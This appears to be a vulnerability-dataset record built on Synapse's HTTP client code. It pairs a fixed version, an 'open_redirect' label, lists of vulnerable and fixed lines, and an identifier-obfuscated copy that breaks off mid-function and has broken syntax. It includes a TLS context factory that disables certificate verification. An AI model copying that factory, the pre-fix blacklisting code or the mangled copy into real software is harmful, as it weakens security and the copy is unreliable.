        max_size: The maximum file size to allow.

    Returns:
        A Deferred which resolves to the length of the read body.
    """
    result = defer.Deferred()
    body_protocol = _ReadBodyToFileProtocol(stream, result, max_size)
    response.deliverBody(body_protocol)
    return result
def encode_query_args(args: Optional[Mapping[str, Union[str, List[str]]]]) -> bytes:
    """
    Encodes a map of query arguments to bytes which can be appended to a URL.

    Args:
        args: The query arguments, a mapping of string to string or list of strings.

    Returns:
        The query arguments encoded as bytes.
    """
    if args is None:
        return b""

    # Normalise each value to a list of UTF-8 encoded byte strings, then let
    # urlencode (doseq=True) expand lists into repeated key=value pairs.
    encoded_args = {
        key: [item.encode("utf8") for item in ([vals] if isinstance(vals, str) else vals)]
        for key, vals in args.items()
    }

    return urllib.parse.urlencode(encoded_args, True).encode("utf8")
class InsecureInterceptableContextFactory(ssl.ContextFactory):
    """
    Factory for PyOpenSSL SSL contexts which accepts any certificate for any domain.

    Do not use this since it allows an attacker to intercept your communications.
    """

    def __init__(self):
        self._context = SSL.Context(SSL.SSLv23_METHOD)
        # VERIFY_NONE plus a no-op callback: certificate validation is disabled.
        self._context.set_verify(VERIFY_NONE, lambda *_: None)

    def getContext(self, hostname=None, port=None):
        return self._context

    def creatorForNetloc(self, hostname, port):
        # IPolicyForHTTPS-style hook: reuse this factory for every host/port.
        return self
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import urllib.parse
from io import BytesIO
from typing import (
TYPE_CHECKING,
Any,
BinaryIO,
Dict,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
Union,
)
import treq
from canonicaljson import encode_canonical_json
from netaddr import IPAddress, IPSet
from prometheus_client import Counter
from zope.interface import implementer, provider
from OpenSSL import SSL
from OpenSSL.SSL import VERIFY_NONE
from twisted.internet import defer, error as twisted_error, protocol, ssl
from twisted.internet.interfaces import (
IAddress,
IHostResolution,
IReactorPluggableNameResolver,
IResolutionReceiver,
)
from twisted.internet.task import Cooperator
from twisted.python.failure import Failure
from twisted.web._newclient import ResponseDone
from twisted.web.client import (
Agent,
HTTPConnectionPool,
ResponseNeverReceived,
readBody,
)
from twisted.web.http import PotentialDataLoss
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IBodyProducer, IResponse
from synapse.api.errors import Codes, HttpResponseException, SynapseError
from synapse.http import QuieterFileBodyProducer, RequestTimedOutError, redact_uri
from synapse.http.proxyagent import ProxyAgent
from synapse.logging.context import make_deferred_yieldable
from synapse.logging.opentracing import set_tag, start_active_span, tags
from synapse.util import json_decoder
from synapse.util.async_helpers import timeout_deferred
if TYPE_CHECKING:
from synapse.app.homeserver import HomeServer
logger = logging.getLogger(__name__)
outgoing_requests_counter = Counter("synapse_http_client_requests", "", ["method"])
incoming_responses_counter = Counter(
"synapse_http_client_responses", "", ["method", "code"]
)
# the type of the headers list, to be passed to the t.w.h.Headers.
# Actually we can mix str and bytes keys, but Mapping treats 'key' as invariant so
# we simplify.
RawHeaders = Union[Mapping[str, "RawHeaderValue"], Mapping[bytes, "RawHeaderValue"]]
# the value actually has to be a List, but List is invariant so we can't specify that
# the entries can either be Lists or bytes.
RawHeaderValue = Sequence[Union[str, bytes]]
# the type of the query params, to be passed into `urlencode`
QueryParamValue = Union[str, bytes, Iterable[Union[str, bytes]]]
QueryParams = Union[Mapping[str, QueryParamValue], Mapping[bytes, QueryParamValue]]
def check_against_blacklist(
    ip_address: IPAddress, ip_whitelist: Optional[IPSet], ip_blacklist: IPSet
) -> bool:
    """
    Compares an IP address to allowed and disallowed IP sets.

    Args:
        ip_address: The IP address to check
        ip_whitelist: Allowed IP addresses.
        ip_blacklist: Disallowed IP addresses.

    Returns:
        True if the IP address is in the blacklist and not in the whitelist.
    """
    # The whitelist, when present, takes precedence over the blacklist.
    blacklisted = ip_address in ip_blacklist
    whitelisted = ip_whitelist is not None and ip_address in ip_whitelist
    return blacklisted and not whitelisted
_EPSILON = 0.00000001
def _make_scheduler(reactor):
"""Makes a schedular suitable for a Cooperator using the given reactor.
(This is effectively just a copy from `twisted.internet.task`)
"""
def _scheduler(x):
return reactor.callLater(_EPSILON, x)
return _scheduler
class _IPBlacklistingResolver:
    """
    A proxy for reactor.nameResolver which only produces non-blacklisted IP
    addresses, preventing DNS rebinding attacks on URL preview.
    """

    def __init__(
        self,
        reactor: IReactorPluggableNameResolver,
        ip_whitelist: Optional[IPSet],
        ip_blacklist: IPSet,
    ):
        """
        Args:
            reactor: The twisted reactor.
            ip_whitelist: IP addresses to allow.
            ip_blacklist: IP addresses to disallow.
        """
        self._reactor = reactor
        self._ip_whitelist = ip_whitelist
        self._ip_blacklist = ip_blacklist

    def resolveHostName(
        self, recv: IResolutionReceiver, hostname: str, portNumber: int = 0
    ) -> IResolutionReceiver:
        # NOTE(review): `recv` is called here, so callers appear to pass a
        # receiver factory/class rather than an instance — confirm with callers.
        r = recv()
        # Addresses collected from the real resolver before filtering.
        addresses = []  # type: List[IAddress]

        def _callback() -> None:
            r.resolutionBegan(None)

            has_bad_ip = False
            for i in addresses:
                ip_address = IPAddress(i.host)

                if check_against_blacklist(
                    ip_address, self._ip_whitelist, self._ip_blacklist
                ):
                    logger.info(
                        "Dropped %s from DNS resolution to %s due to blacklist"
                        % (ip_address, hostname)
                    )
                    has_bad_ip = True

            # if we have a blacklisted IP, we'd like to raise an error to block the
            # request, but all we can really do from here is claim that there were no
            # valid results.
            if not has_bad_ip:
                for i in addresses:
                    r.addressResolved(i)
            r.resolutionComplete()

        @provider(IResolutionReceiver)
        class EndpointReceiver:
            @staticmethod
            def resolutionBegan(resolutionInProgress: IHostResolution) -> None:
                pass

            @staticmethod
            def addressResolved(address: IAddress) -> None:
                addresses.append(address)

            @staticmethod
            def resolutionComplete() -> None:
                # All addresses collected; filter and forward them now.
                _callback()

        self._reactor.nameResolver.resolveHostName(
            EndpointReceiver, hostname, portNumber=portNumber
        )

        return r
@implementer(IReactorPluggableNameResolver)
class BlacklistingReactorWrapper:
    """
    A Reactor wrapper which will prevent DNS resolution to blacklisted IP
    addresses, to prevent DNS rebinding.
    """

    def __init__(
        self,
        reactor: IReactorPluggableNameResolver,
        ip_whitelist: Optional[IPSet],
        ip_blacklist: IPSet,
    ):
        self._reactor = reactor

        # We need to use a DNS resolver which filters out blacklisted IP
        # addresses, to prevent DNS rebinding.
        self._nameResolver = _IPBlacklistingResolver(
            self._reactor, ip_whitelist, ip_blacklist
        )

    def __getattr__(self, attr: str) -> Any:
        # Passthrough to the real reactor except for the DNS resolver.
        if attr == "nameResolver":
            return self._nameResolver
        else:
            return getattr(self._reactor, attr)
class BlacklistingAgentWrapper(Agent):
    """
    An Agent wrapper which will prevent access to IP addresses being accessed
    directly (without an IP address lookup).
    """

    def __init__(
        self,
        agent: IAgent,
        ip_whitelist: Optional[IPSet] = None,
        ip_blacklist: Optional[IPSet] = None,
    ):
        """
        Args:
            agent: The Agent to wrap.
            ip_whitelist: IP addresses to allow.
            ip_blacklist: IP addresses to disallow.
        """
        self._agent = agent
        self._ip_whitelist = ip_whitelist
        self._ip_blacklist = ip_blacklist

    def request(
        self,
        method: bytes,
        uri: bytes,
        headers: Optional[Headers] = None,
        bodyProducer: Optional[IBodyProducer] = None,
    ) -> defer.Deferred:
        h = urllib.parse.urlparse(uri.decode("ascii"))

        try:
            # If the hostname is a literal IP address, check it against the
            # blacklist directly, since no DNS lookup will occur for it.
            ip_address = IPAddress(h.hostname)

            if check_against_blacklist(
                ip_address, self._ip_whitelist, self._ip_blacklist
            ):
                logger.info("Blocking access to %s due to blacklist" % (ip_address,))
                e = SynapseError(403, "IP address blocked by IP blacklist entry")
                return defer.fail(Failure(e))
        except Exception:
            # Not an IP
            pass

        return self._agent.request(
            method, uri, headers=headers, bodyProducer=bodyProducer
        )
class SimpleHttpClient:
"""
A simple, no-frills HTTP client with methods that wrap up common ways of
using HTTP in Matrix
"""
def __init__(
    self,
    hs: "HomeServer",
    treq_args: Optional[Dict[str, Any]] = None,
    ip_whitelist: Optional[IPSet] = None,
    ip_blacklist: Optional[IPSet] = None,
    http_proxy: Optional[bytes] = None,
    https_proxy: Optional[bytes] = None,
):
    """
    Args:
        hs: The homeserver instance.
        treq_args: Extra keyword arguments to be given to treq.request.
        ip_blacklist: The IP addresses that are blacklisted that
            we may not request.
        ip_whitelist: The whitelisted IP addresses, that we can
            request if it were otherwise caught in a blacklist.
        http_proxy: proxy server to use for http connections. host[:port]
        https_proxy: proxy server to use for https connections. host[:port]
    """
    self.hs = hs

    self._ip_whitelist = ip_whitelist
    self._ip_blacklist = ip_blacklist
    # Fixed: the default was a mutable `{}` argument, shared between every
    # SimpleHttpClient constructed without an explicit treq_args.
    self._extra_treq_args = treq_args or {}

    self.user_agent = hs.version_string
    self.clock = hs.get_clock()
    if hs.config.user_agent_suffix:
        self.user_agent = "%s %s" % (self.user_agent, hs.config.user_agent_suffix)

    # We use this for our body producers to ensure that they use the correct
    # reactor.
    self._cooperator = Cooperator(scheduler=_make_scheduler(hs.get_reactor()))

    self.user_agent = self.user_agent.encode("ascii")

    if self._ip_blacklist:
        # If we have an IP blacklist, we need to use a DNS resolver which
        # filters out blacklisted IP addresses, to prevent DNS rebinding.
        self.reactor = BlacklistingReactorWrapper(
            hs.get_reactor(), self._ip_whitelist, self._ip_blacklist
        )
    else:
        self.reactor = hs.get_reactor()

    # the pusher makes lots of concurrent SSL connections to sygnal, and
    # tends to do so in batches, so we need to allow the pool to keep
    # lots of idle connections around.
    pool = HTTPConnectionPool(self.reactor)
    # XXX: The justification for using the cache factor here is that larger instances
    # will need both more cache and more connections.
    # Still, this should probably be a separate dial
    pool.maxPersistentPerHost = max((100 * hs.config.caches.global_factor, 5))
    pool.cachedConnectionTimeout = 2 * 60

    self.agent = ProxyAgent(
        self.reactor,
        connectTimeout=15,
        contextFactory=self.hs.get_http_client_context_factory(),
        pool=pool,
        http_proxy=http_proxy,
        https_proxy=https_proxy,
    )

    if self._ip_blacklist:
        # If we have an IP blacklist, we then install the blacklisting Agent
        # which prevents direct access to IP addresses, that are not caught
        # by the DNS resolution.
        self.agent = BlacklistingAgentWrapper(
            self.agent,
            ip_whitelist=self._ip_whitelist,
            ip_blacklist=self._ip_blacklist,
        )
async def request(
    self,
    method: str,
    uri: str,
    data: Optional[bytes] = None,
    headers: Optional[Headers] = None,
) -> IResponse:
    """Sends a request via treq/the configured agent, with metrics and tracing.

    Args:
        method: HTTP method to use.
        uri: URI to query.
        data: Data to send in the request body, if applicable.
        headers: Request headers.

    Returns:
        Response object, once the headers have been read.

    Raises:
        RequestTimedOutError if the request times out before the headers are read
    """
    outgoing_requests_counter.labels(method).inc()

    # log request but strip `access_token` (AS requests for example include this)
    logger.debug("Sending request %s %s", method, redact_uri(uri))

    with start_active_span(
        "outgoing-client-request",
        tags={
            tags.SPAN_KIND: tags.SPAN_KIND_RPC_CLIENT,
            tags.HTTP_METHOD: method,
            tags.HTTP_URL: uri,
        },
        finish_on_close=True,
    ):
        try:
            body_producer = None
            if data is not None:
                # QuieterFileBodyProducer suppresses spurious log noise when
                # the request is cancelled part-way through the body.
                body_producer = QuieterFileBodyProducer(
                    BytesIO(data), cooperator=self._cooperator,
                )

            request_deferred = treq.request(
                method,
                uri,
                agent=self.agent,
                data=body_producer,
                headers=headers,
                **self._extra_treq_args,
            )  # type: defer.Deferred

            # we use our own timeout mechanism rather than treq's as a workaround
            # for https://twistedmatrix.com/trac/ticket/9534.
            request_deferred = timeout_deferred(
                request_deferred, 60, self.hs.get_reactor(),
            )

            # turn timeouts into RequestTimedOutErrors
            request_deferred.addErrback(_timeout_to_request_timed_out_error)

            response = await make_deferred_yieldable(request_deferred)

            incoming_responses_counter.labels(method, response.code).inc()
            logger.info(
                "Received response to %s %s: %s",
                method,
                redact_uri(uri),
                response.code,
            )
            return response
        except Exception as e:
            incoming_responses_counter.labels(method, "ERR").inc()
            logger.info(
                "Error sending request to %s %s: %s %s",
                method,
                redact_uri(uri),
                type(e).__name__,
                e.args[0],
            )
            set_tag(tags.ERROR, True)
            set_tag("error_reason", e.args[0])
            raise
async def post_urlencoded_get_json(
self,
uri: str,
args: Optional[Mapping[str, Union[str, List[str]]]] = None,
headers: Optional[RawHeaders] = None,
) -> Any:
"""
Args:
uri: uri to query
args: parameters to be url-encoded in the body
headers: a map from header name to a list of values for that header
Returns:
parsed json
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException: On a non-2xx HTTP response.
ValueError: if the response was not JSON
"""
# TODO: Do we ever want to log message contents?
logger.debug("post_urlencoded_get_json args: %s", args)
query_bytes = encode_query_args(args)
actual_headers = {
b"Content-Type": [b"application/x-www-form-urlencoded"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request(
"POST", uri, headers=Headers(actual_headers), data=query_bytes
)
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return json_decoder.decode(body.decode("utf-8"))
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
async def post_json_get_json(
self, uri: str, post_json: Any, headers: Optional[RawHeaders] = None
) -> Any:
"""
Args:
uri: URI to query.
post_json: request body, to be encoded as json
headers: a map from header name to a list of values for that header
Returns:
parsed json
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException: On a non-2xx HTTP response.
ValueError: if the response was not JSON
"""
json_str = encode_canonical_json(post_json)
logger.debug("HTTP POST %s -> %s", json_str, uri)
actual_headers = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request(
"POST", uri, headers=Headers(actual_headers), data=json_str
)
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return json_decoder.decode(body.decode("utf-8"))
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
async def get_json(
    self,
    uri: str,
    args: Optional[QueryParams] = None,
    headers: Optional[RawHeaders] = None,
) -> Any:
    """Gets some json from the given URI.

    Args:
        uri: The URI to request, not including query parameters
        args: A dictionary used to create query string
        headers: a map from header name to a list of values for that header

    Returns:
        Succeeds when we get a 2xx HTTP response, with the HTTP body as JSON.

    Raises:
        RequestTimedOutError: if there is a timeout before the response headers
            are received. Note there is currently no timeout on reading the
            response body.
        HttpResponseException On a non-2xx HTTP response.
        ValueError: if the response was not JSON
    """
    # Advertise that we want JSON; caller-supplied headers may override this.
    actual_headers = {b"Accept": [b"application/json"]}
    if headers:
        actual_headers.update(headers)  # type: ignore

    # BUG FIX: the merged `actual_headers` dict was previously built but the
    # original `headers` argument was forwarded instead, so the Accept header
    # was silently dropped. Forward the merged dict.
    body = await self.get_raw(uri, args, headers=actual_headers)
    return json_decoder.decode(body.decode("utf-8"))
async def put_json(
self,
uri: str,
json_body: Any,
args: Optional[QueryParams] = None,
headers: RawHeaders = None,
) -> Any:
"""Puts some json to the given URI.
Args:
uri: The URI to request, not including query parameters
json_body: The JSON to put in the HTTP body,
args: A dictionary used to create query strings
headers: a map from header name to a list of values for that header
Returns:
Succeeds when we get a 2xx HTTP response, with the HTTP body as JSON.
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException On a non-2xx HTTP response.
ValueError: if the response was not JSON
"""
if args:
query_str = urllib.parse.urlencode(args, True)
uri = "%s?%s" % (uri, query_str)
json_str = encode_canonical_json(json_body)
actual_headers = {
b"Content-Type": [b"application/json"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request(
"PUT", uri, headers=Headers(actual_headers), data=json_str
)
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return json_decoder.decode(body.decode("utf-8"))
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
async def get_raw(
self,
uri: str,
args: Optional[QueryParams] = None,
headers: Optional[RawHeaders] = None,
) -> bytes:
"""Gets raw text from the given URI.
Args:
uri: The URI to request, not including query parameters
args: A dictionary used to create query strings
headers: a map from header name to a list of values for that header
Returns:
Succeeds when we get a 2xx HTTP response, with the
HTTP body as bytes.
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException on a non-2xx HTTP response.
"""
if args:
query_str = urllib.parse.urlencode(args, True)
uri = "%s?%s" % (uri, query_str)
actual_headers = {b"User-Agent": [self.user_agent]}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request("GET", uri, headers=Headers(actual_headers))
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return body
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
# XXX: FIXME: This is horribly copy-pasted from matrixfederationclient.
# The two should be factored out.
async def get_file(
self,
url: str,
output_stream: BinaryIO,
max_size: Optional[int] = None,
headers: Optional[RawHeaders] = None,
) -> Tuple[int, Dict[bytes, List[bytes]], str, int]:
"""GETs a file from a given URL
Args:
url: The URL to GET
output_stream: File to write the response body to.
headers: A map from header name to a list of values for that header
Returns:
A tuple of the file length, dict of the response
headers, absolute URI of the response and HTTP response code.
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
SynapseError: if the response is not a 2xx, the remote file is too large, or
another exception happens during the download.
"""
actual_headers = {b"User-Agent": [self.user_agent]}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request("GET", url, headers=Headers(actual_headers))
resp_headers = dict(response.headers.getAllRawHeaders())
if (
b"Content-Length" in resp_headers
and max_size
and int(resp_headers[b"Content-Length"][0]) > max_size
):
logger.warning("Requested URL is too large > %r bytes" % (max_size,))
raise SynapseError(
502,
"Requested file is too large > %r bytes" % (max_size,),
Codes.TOO_LARGE,
)
if response.code > 299:
logger.warning("Got %d when downloading %s" % (response.code, url))
raise SynapseError(502, "Got error %d" % (response.code,), Codes.UNKNOWN)
# TODO: if our Content-Type is HTML or something, just read the first
# N bytes into RAM rather than saving it all to disk only to read it
# straight back in again
try:
length = await make_deferred_yieldable(
readBodyToFile(response, output_stream, max_size)
)
except SynapseError:
# This can happen e.g. because the body is too large.
raise
except Exception as e:
raise SynapseError(502, ("Failed to download remote body: %s" % e)) from e
return (
length,
resp_headers,
response.request.absoluteURI.decode("ascii"),
response.code,
)
def _timeout_to_request_timed_out_error(f: Failure):
if f.check(twisted_error.TimeoutError, twisted_error.ConnectingCancelledError):
# The TCP connection has its own timeout (set by the 'connectTimeout' param
# on the Agent), which raises twisted_error.TimeoutError exception.
raise RequestTimedOutError("Timeout connecting to remote server")
elif f.check(defer.TimeoutError, ResponseNeverReceived):
# this one means that we hit our overall timeout on the request
raise RequestTimedOutError("Timeout waiting for response from remote server")
return f
class _ReadBodyToFileProtocol(protocol.Protocol):
def __init__(
self, stream: BinaryIO, deferred: defer.Deferred, max_size: Optional[int]
):
self.stream = stream
self.deferred = deferred
self.length = 0
self.max_size = max_size
def dataReceived(self, data: bytes) -> None:
self.stream.write(data)
self.length += len(data)
if self.max_size is not None and self.length >= self.max_size:
self.deferred.errback(
SynapseError(
502,
"Requested file is too large > %r bytes" % (self.max_size,),
Codes.TOO_LARGE,
)
)
self.deferred = defer.Deferred()
self.transport.loseConnection()
def connectionLost(self, reason: Failure) -> None:
if reason.check(ResponseDone):
self.deferred.callback(self.length)
elif reason.check(PotentialDataLoss):
# stolen from https://github.com/twisted/treq/pull/49/files
# http://twistedmatrix.com/trac/ticket/4840
self.deferred.callback(self.length)
else:
self.deferred.errback(reason)
def readBodyToFile(
response: IResponse, stream: BinaryIO, max_size: Optional[int]
) -> defer.Deferred:
"""
Read a HTTP response body to a file-object. Optionally enforcing a maximum file size.
Args:
response: The HTTP response to read from.
stream: The file-object to write to.
max_size: The maximum file size to allow.
Returns:
A Deferred which resolves to the length of the read body.
"""
d = defer.Deferred()
response.deliverBody(_ReadBodyToFileProtocol(stream, d, max_size))
return d
def encode_query_args(args: Optional[Mapping[str, Union[str, List[str]]]]) -> bytes:
"""
Encodes a map of query arguments to bytes which can be appended to a URL.
Args:
args: The query arguments, a mapping of string to string or list of strings.
Returns:
The query arguments encoded as bytes.
"""
if args is None:
return b""
encoded_args = {}
for k, vs in args.items():
if isinstance(vs, str):
vs = [vs]
encoded_args[k] = [v.encode("utf8") for v in vs]
query_str = urllib.parse.urlencode(encoded_args, True)
return query_str.encode("utf8")
class InsecureInterceptableContextFactory(ssl.ContextFactory):
    """
    Factory for PyOpenSSL SSL contexts which accepts any certificate for any domain.

    Do not use this since it allows an attacker to intercept your communications.
    """

    def __init__(self):
        # Build a context that performs no certificate verification at all:
        # the verify callback unconditionally accepts whatever it is given.
        context = SSL.Context(SSL.SSLv23_METHOD)
        context.set_verify(VERIFY_NONE, lambda *_: None)
        self._context = context

    def getContext(self, hostname=None, port=None):
        # Same (insecure) context regardless of the destination.
        return self._context

    def creatorForNetloc(self, hostname, port):
        # IPolicyForHTTPS: this factory itself acts as the connection creator.
        return self
| open_redirect | {
"code": [
"class IPBlacklistingResolver:",
" real_reactor = hs.get_reactor()",
" nameResolver = IPBlacklistingResolver(",
" real_reactor, self._ip_whitelist, self._ip_blacklist",
" @implementer(IReactorPluggableNameResolver)",
" class Reactor:",
" def __getattr__(_self, attr):",
" if attr == \"nameResolver\":",
" return nameResolver",
" else:",
" return getattr(real_reactor, attr)",
" self.reactor = Reactor()"
],
"line_no": [
128,
295,
298,
299,
302,
303,
304,
305,
306,
307,
308,
310
]
} | {
"code": [
"class _IPBlacklistingResolver:",
"@implementer(IReactorPluggableNameResolver)",
" \"\"\"",
" addresses, to prevent DNS rebinding.",
" def __init__(",
" self,",
" reactor: IReactorPluggableNameResolver,",
" ip_whitelist: Optional[IPSet],",
" ip_blacklist: IPSet,",
" self._reactor = reactor",
" self._reactor, ip_whitelist, ip_blacklist",
" )",
" if attr == \"nameResolver\":",
" return self._nameResolver",
" else:",
" return getattr(self._reactor, attr)",
" self.reactor = BlacklistingReactorWrapper(",
" hs.get_reactor(), self._ip_whitelist, self._ip_blacklist"
],
"line_no": [
128,
202,
204,
206,
209,
210,
211,
212,
213,
215,
220,
221,
225,
226,
227,
228,
326,
327
]
} |
import logging
import .urllib.parse
from io import BytesIO
from typing import (
TYPE_CHECKING,
Any,
BinaryIO,
Dict,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
Union,
)
import treq
from canonicaljson import .encode_canonical_json
from netaddr import IPAddress, IPSet
from prometheus_client import Counter
from zope.interface import implementer, provider
from OpenSSL import SSL
from OpenSSL.SSL import VERIFY_NONE
from twisted.internet import .defer, error as twisted_error, protocol, ssl
from twisted.internet.interfaces import (
IAddress,
IHostResolution,
IReactorPluggableNameResolver,
IResolutionReceiver,
)
from twisted.internet.task import Cooperator
from twisted.python.failure import Failure
from twisted.web._newclient import ResponseDone
from twisted.web.client import (
Agent,
HTTPConnectionPool,
ResponseNeverReceived,
readBody,
)
from twisted.web.http import PotentialDataLoss
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IBodyProducer, IResponse
from synapse.api.errors import Codes, HttpResponseException, SynapseError
from synapse.http import QuieterFileBodyProducer, RequestTimedOutError, redact_uri
from synapse.http.proxyagent import ProxyAgent
from synapse.logging.context import make_deferred_yieldable
from synapse.logging.opentracing import set_tag, start_active_span, tags
from synapse.util import json_decoder
from synapse.util.async_helpers import timeout_deferred
if TYPE_CHECKING:
from synapse.app.homeserver import HomeServer
VAR_0 = logging.getLogger(__name__)
VAR_1 = Counter("synapse_http_client_requests", "", ["method"])
VAR_2 = Counter(
"synapse_http_client_responses", "", ["method", "code"]
)
VAR_3 = Union[Mapping[str, "RawHeaderValue"], Mapping[bytes, "RawHeaderValue"]]
VAR_4 = Sequence[Union[str, bytes]]
VAR_5 = Union[str, bytes, Iterable[Union[str, bytes]]]
VAR_6 = Union[Mapping[str, VAR_5], Mapping[bytes, VAR_5]]
def FUNC_0(
VAR_7: IPAddress, VAR_8: Optional[IPSet], VAR_9: IPSet
) -> bool:
if VAR_7 in VAR_9:
if VAR_8 is None or VAR_7 not in VAR_8:
return True
return False
VAR_10 = 0.00000001
def FUNC_1(VAR_11):
def FUNC_5(VAR_17):
return VAR_11.callLater(VAR_10, VAR_17)
return FUNC_5
class CLASS_0:
def __init__(
self,
VAR_11: IReactorPluggableNameResolver,
VAR_8: Optional[IPSet],
VAR_9: IPSet,
):
self._reactor = VAR_11
self._ip_whitelist = VAR_8
self._ip_blacklist = VAR_9
def FUNC_6(
self, VAR_18: IResolutionReceiver, VAR_19: str, VAR_20: int = 0
) -> IResolutionReceiver:
VAR_41 = VAR_18()
VAR_42 = [] # type: List[IAddress]
def FUNC_18() -> None:
VAR_41.resolutionBegan(None)
VAR_51 = False
for i in VAR_42:
VAR_7 = IPAddress(i.host)
if FUNC_0(
VAR_7, self._ip_whitelist, self._ip_blacklist
):
VAR_0.info(
"Dropped %s from DNS resolution to %s due to blacklist"
% (VAR_7, VAR_19)
)
VAR_51 = True
if not VAR_51:
for i in VAR_42:
VAR_41.addressResolved(i)
VAR_41.resolutionComplete()
@provider(IResolutionReceiver)
class CLASS_5:
@staticmethod
def FUNC_19(VAR_52: IHostResolution) -> None:
pass
@staticmethod
def FUNC_20(VAR_53: IAddress) -> None:
VAR_42.append(VAR_53)
@staticmethod
def FUNC_21() -> None:
FUNC_18()
self._reactor.nameResolver.resolveHostName(
CLASS_5, VAR_19, VAR_20=portNumber
)
return VAR_41
class CLASS_1(Agent):
def __init__(
self,
VAR_21: IAgent,
VAR_8: Optional[IPSet] = None,
VAR_9: Optional[IPSet] = None,
):
self._agent = VAR_21
self._ip_whitelist = VAR_8
self._ip_blacklist = VAR_9
def FUNC_7(
self,
VAR_22: bytes,
VAR_23: bytes,
VAR_24: Optional[Headers] = None,
VAR_25: Optional[IBodyProducer] = None,
) -> defer.Deferred:
VAR_43 = urllib.parse.urlparse(VAR_23.decode("ascii"))
try:
VAR_7 = IPAddress(VAR_43.hostname)
if FUNC_0(
VAR_7, self._ip_whitelist, self._ip_blacklist
):
VAR_0.info("Blocking access to %s due to blacklist" % (VAR_7,))
VAR_58 = SynapseError(403, "IP VAR_53 blocked by IP blacklist entry")
return defer.fail(Failure(VAR_58))
except Exception:
pass
return self._agent.request(
VAR_22, VAR_23, VAR_24=headers, VAR_25=bodyProducer
)
class CLASS_2:
def __init__(
self,
VAR_26: "HomeServer",
VAR_27: Dict[str, Any] = {},
VAR_8: Optional[IPSet] = None,
VAR_9: Optional[IPSet] = None,
VAR_28: Optional[bytes] = None,
VAR_29: Optional[bytes] = None,
):
self.hs = VAR_26
self._ip_whitelist = VAR_8
self._ip_blacklist = VAR_9
self._extra_treq_args = VAR_27
self.user_agent = VAR_26.version_string
self.clock = VAR_26.get_clock()
if VAR_26.config.user_agent_suffix:
self.user_agent = "%s %s" % (self.user_agent, VAR_26.config.user_agent_suffix)
self._cooperator = Cooperator(scheduler=FUNC_1(VAR_26.get_reactor()))
self.user_agent = self.user_agent.encode("ascii")
if self._ip_blacklist:
VAR_54 = VAR_26.get_reactor()
VAR_55 = CLASS_0(
VAR_54, self._ip_whitelist, self._ip_blacklist
)
@implementer(IReactorPluggableNameResolver)
class CLASS_6:
def __getattr__(VAR_59, VAR_60):
if VAR_60 == "nameResolver":
return VAR_55
else:
return getattr(VAR_54, VAR_60)
self.reactor = CLASS_6()
else:
self.reactor = VAR_26.get_reactor()
VAR_44 = HTTPConnectionPool(self.reactor)
VAR_44.maxPersistentPerHost = max((100 * VAR_26.config.caches.global_factor, 5))
VAR_44.cachedConnectionTimeout = 2 * 60
self.agent = ProxyAgent(
self.reactor,
connectTimeout=15,
contextFactory=self.hs.get_http_client_context_factory(),
VAR_44=pool,
VAR_28=http_proxy,
VAR_29=https_proxy,
)
if self._ip_blacklist:
self.agent = CLASS_1(
self.agent,
VAR_8=self._ip_whitelist,
VAR_9=self._ip_blacklist,
)
async def FUNC_7(
self,
VAR_22: str,
VAR_23: str,
VAR_30: Optional[bytes] = None,
VAR_24: Optional[Headers] = None,
) -> IResponse:
VAR_1.labels(VAR_22).inc()
VAR_0.debug("Sending FUNC_7 %s %s", VAR_22, redact_uri(VAR_23))
with start_active_span(
"outgoing-client-request",
tags={
tags.SPAN_KIND: tags.SPAN_KIND_RPC_CLIENT,
tags.HTTP_METHOD: VAR_22,
tags.HTTP_URL: VAR_23,
},
finish_on_close=True,
):
try:
VAR_61 = None
if VAR_30 is not None:
VAR_61 = QuieterFileBodyProducer(
BytesIO(VAR_30), cooperator=self._cooperator,
)
VAR_62 = treq.request(
VAR_22,
VAR_23,
VAR_21=self.agent,
VAR_30=VAR_61,
VAR_24=headers,
**self._extra_treq_args,
) # type: defer.Deferred
VAR_62 = timeout_deferred(
VAR_62, 60, self.hs.get_reactor(),
)
VAR_62.addErrback(FUNC_2)
VAR_13 = await make_deferred_yieldable(VAR_62)
VAR_2.labels(VAR_22, VAR_13.code).inc()
VAR_0.info(
"Received VAR_13 to %s %s: %s",
VAR_22,
redact_uri(VAR_23),
VAR_13.code,
)
return VAR_13
except Exception as VAR_58:
